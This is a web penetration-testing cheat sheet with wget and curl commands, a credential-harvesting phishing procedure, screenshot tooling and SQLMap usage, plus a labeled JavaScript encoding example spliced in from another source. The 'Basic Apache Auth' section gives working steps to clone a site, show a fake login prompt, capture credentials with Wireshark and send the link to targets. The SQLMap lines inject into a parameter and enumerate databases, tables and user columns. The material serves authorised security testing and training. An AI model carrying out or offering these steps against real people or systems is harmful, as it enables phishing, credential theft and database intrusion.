(last edited: 08/14/2019) - Firefox Type Conversions - WGET - CURL - Basic Apache Auth - Automated Web Screenshots - SQLMap

Firefox Type Conversions
| ASCII -> Base64 | javascript:btoa("ascii str") |
| Base64 -> ASCII | javascript:atob("base64==") |
| ASCII -> URI | javascript:encodeURI(" |
| URI -> ASCII | javascript:decodeURI("%3cscript%3E") |
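The same four conversions, as an added example that is not from the original cheat sheet, wrapped in functions so the edge cases the one-liners hide are explicit (btoa() rejecting non-Latin-1 input, encodeURI() versus encodeURIComponent(), malformed escapes); all function names are mine, and it runs in the Firefox console or in Node 16+.

```javascript
// Added example, not from the original cheat sheet. Works in the Firefox
// console and in Node >= 16 (btoa, atob, TextEncoder and TextDecoder are
// globals in both). All function names are my own.

// btoa() only accepts code points <= U+00FF; anything else throws
// InvalidCharacterError. Encoding to UTF-8 bytes first makes it safe for any string.
function base64EncodeUtf8(str) {
  const bytes = new TextEncoder().encode(str);
  let latin1 = "";
  for (const b of bytes) latin1 += String.fromCharCode(b); // one char per byte
  return btoa(latin1);
}

// Inverse of the above. fatal:true makes the decoder throw on invalid UTF-8
// instead of silently substituting U+FFFD.
function base64DecodeUtf8(b64) {
  const latin1 = atob(b64);
  const bytes = Uint8Array.from(latin1, (c) => c.charCodeAt(0));
  return new TextDecoder("utf-8", { fatal: true }).decode(bytes);
}

// true if the plain btoa() from the table would accept this string as-is.
function plainBtoaAccepts(str) {
  try { btoa(str); return true; } catch (e) { return false; }
}

// encodeURI() expects a whole URI, so it leaves the reserved set ; , / ? : @ & = + $ #
// untouched; encodeURIComponent() encodes those too, which is what a single query
// value needs. Both turn < and > into %3C and %3E.
function encodeBoth(str) {
  return { uri: encodeURI(str), component: encodeURIComponent(str) };
}

// decodeURI() refuses to decode escapes of the reserved set (%26 stays "%26");
// decodeURIComponent() decodes everything. Both accept lower- or upper-case hex.
function decodeBoth(str) {
  return { uri: decodeURI(str), component: decodeURIComponent(str) };
}

// Both decoders throw URIError on a malformed escape such as a lone "%E0";
// report that as a boolean instead of an exception.
function isMalformedEscape(str) {
  try { decodeURIComponent(str); return false; } catch (e) { return e instanceof URIError; }
}
```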
WGET
wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username=admin&password=pass&Login=Login" http://(url)/login.php
CURL
curl -I -X HEAD -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" http://(ip)
curl -u user:pass -o outfile https://login.bob.com
curl ftp://user:pass@bob.com/directory/

SEQUENTIAL LOOKUP
curl http://bob.com/file[1-10].txt
Basic Apache Auth
The steps below will clone a website and redirect after 3 seconds to another page requiring basic authentication. It has proven very useful for collecting credentials during social engineering engagements.
1. Start Social Engineering Toolkit (SET)
   > /pentest/exploits/set/./set
2. Through SET, use the 'Website Attack Vector' menu to clone your preferred website. * Do not close SET *
3. In a new terminal create a new directory (lowercase L)
   > mkdir /var/www/l
4. Browse to the SET directory and copy the cloned site
   > cd /pentest/exploits/set/src/web_clone/site/template/
   > cp index.html /var/www/index.html
   > cp index.html /var/www/l/index.html
5. Open /var/www/index.html and add this tag between the <head> tags:
   <meta http-equiv="refresh" content="3;url=http://(domain|ip)/l/index.html"/>
6. Create a blank password file to be used for basic auth
   > touch /etc/apache2/.htpasswd
7. Open /etc/apache2/sites-available/default and add:
   <Directory /var/www/l>
      AuthType Basic
      AuthName "PORTAL LOGIN BANNER"
      AuthUserFile /etc/apache2/.htpasswd
      Require user test
   </Directory>
8. Start Apache2
   > /etc/init.d/apache2 start
9. Start Wireshark and add the filter:
   http.authbasic
10. Send the following link to your target users
   http://(domain|ip)/index.html
Automated Web Screenshots
Install dependencies:
• wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
• tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
• cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
• git clone git://github.com/SpiderLabs/Nmap-Tools.git
• cd Nmap-Tools/NSE/
• cp http-screenshot.nse /usr/local/share/nmap/scripts/
• nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
• nmap -A --script=http-screenshot -p80,443 1.1.1.0/24 -oA nmap-screengrab
Script will generate an HTML preview page with all screenshots:
#!/bin/bash
printf "<HTML><BODY><BR>" > preview.html
# The NSE script names each file <prefix>:<port>.png; split on the colon so the
# caption shows host:port, and write the colon as %3A in the IMG SRC.
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> preview.html
printf "</BODY></HTML>" >> preview.html
Install dependencies (PeepingTom):
• Download PhantomJS: https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
• Download PeepingTom: git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
• Extract phantomjs from phantomjs-1.9.2-linux-x86_64.tar.bz2 and copy it to the peepingtom directory
• Run PeepingTom: python peepingtom.py http://<mytarget.com>
SQLMap
./sqlmap.py -u "http://<url>?id=1&str=val"
./sqlmap.py -u "http://<url>" --data="id=1&str=val"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --dbms="<mssql|mysql|oracle|postgres>"
1. Login and note the cookie values (cookie1=val1, cookie2=val2)
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --current-db --current-user
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --tables -D "testdb"
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --columns -T "users"